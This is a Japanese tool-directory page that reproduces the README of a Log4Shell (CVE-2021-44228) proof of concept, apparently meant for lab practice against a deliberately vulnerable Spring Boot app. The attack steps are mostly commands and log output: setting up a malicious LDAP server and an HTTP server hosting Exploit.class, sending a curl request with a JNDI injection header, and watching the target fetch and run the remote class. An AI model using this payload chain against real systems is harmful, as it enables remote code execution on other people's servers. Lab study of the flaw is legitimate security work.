Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-44228 — CVE-2021-44228 用の PoC。 | Kitploit
ツール/GitHubGitHub/marcourbano/cve-2021-44228
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ラボと実践
GitHubmarcourbano/cve-2021-44228

CVE-2021-44228

CVE-2021-44228 用の PoC。

リポジトリを見る
773年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Log4Shell POC (CVE-2021-44228)

このリポジトリの目的は、CVE-2021-44228(通称 Log4Shell)を悪用するために必要なすべてのコンポーネントを提供し、
その悪用方法を示すことです。

この脆弱性を悪用するために必要な要素は次のとおりです。

  1. 脆弱なアプリケーションをエクスプロイトへリダイレクトする LDAPサーバー。
  2. 脆弱なバージョンの Log4J を使用する 脆弱なアプリケーション (CVE-2021-44228 に対して脆弱な Spring Boot Web アプリケーション)。
  3. 脆弱なアプリケーションによってロードされる Java Exploit.class (および対応する Exploit.java ファイル)。
  4. 脆弱なアプリケーションが悪意のある Exploit.class をダウンロードする HTTPサーバー。

クレジット:

  • LDAPサーバー は mbechler の Marshalsec リポジトリから取得しました。
  • 脆弱なアプリケーション は christophetd が提供するものです。

前提条件:

  • Maven
  • Java
  • Docker
  • Python

LDAPサーバー と HTTPサーバー の実行

HTTPサーバー

1. exploit フォルダーに移動し、Python を使用して HTTP サーバーを起動します。

root@kitploit:~
python3 -m http.server PORT

LDAPサーバー

1. ldap_server フォルダーに移動し、pom.xml をビルドします。

root@kitploit:~
mvn clean package -DskipTests

2. target フォルダーに移動し、http_server_ip と http_server_port を指定してサーバーを起動します。

root@kitploit:~
java -cp ldap_server-1.0-all.jar marshalsec.jndi.LDAPRefServer "http://http_server_ip:http_server_port/#Exploit"

注: このコマンドは、すべての LDAP クエリに対して Exploit.class の URI を返すように悪意のある LDAP サーバーを実行します。

脆弱なアプリケーション の実行

脆弱なアプリケーションの Docker コンテナを実行します。

root@kitploit:~
docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

注: デフォルトでは脆弱なアプリケーションをポート 8080 で実行しています。必要に応じて変更してください。

悪用

vulnerable_application、ldap_server、http_server が実行されたら、脆弱なサーバーに悪意のある HTTP リクエストを送信します。

root@kitploit:~
curl VULNERABLE_APPLICATION_IP:8080 -H 'X-Api-Version: ${jndi:ldap://ldap_server_ip:1389/a}'

vulnerable_application はペイロードをログに記録し、LDAP クエリを実行します。

root@kitploit:~
2021-12-24 18:48:14.644  INFO 1 --- [nio-8080-exec-1] HelloWorld: Received a request for API version ${jndi:ldap://10.0.2.15:1389/a}

ldap_server は Exploit.class の URI を返答します。

root@kitploit:~
Listening on 0.0.0.0:1389
Send LDAP reference result for a redirecting to http://10.0.2.15:8443/Exploit.class

http_server は Exploit.class へのリクエストを受信します。

root@kitploit:~
Serving HTTP on 0.0.0.0 port 8443 (http://0.0.0.0:8443/) ...
172.17.0.2 - - [24/Dec/2021 19:48:14] "GET /Exploit.class HTTP/1.1" 200 -

最後に、エクスプロイトによって被害者のファイルシステム上に新しいファイルが作成されたことを確認できます。この例では、Docker コンテナのファイルシステムを確認する必要があります。

参考

https://www.lunasec.io/docs/blog/log4j-zero-day/
https://github.com/mbechler/marshalsec
https://github.com/christophetd/log4shell-vulnerable-app

貢献者

@CrashOverflow

ツールをダウンロード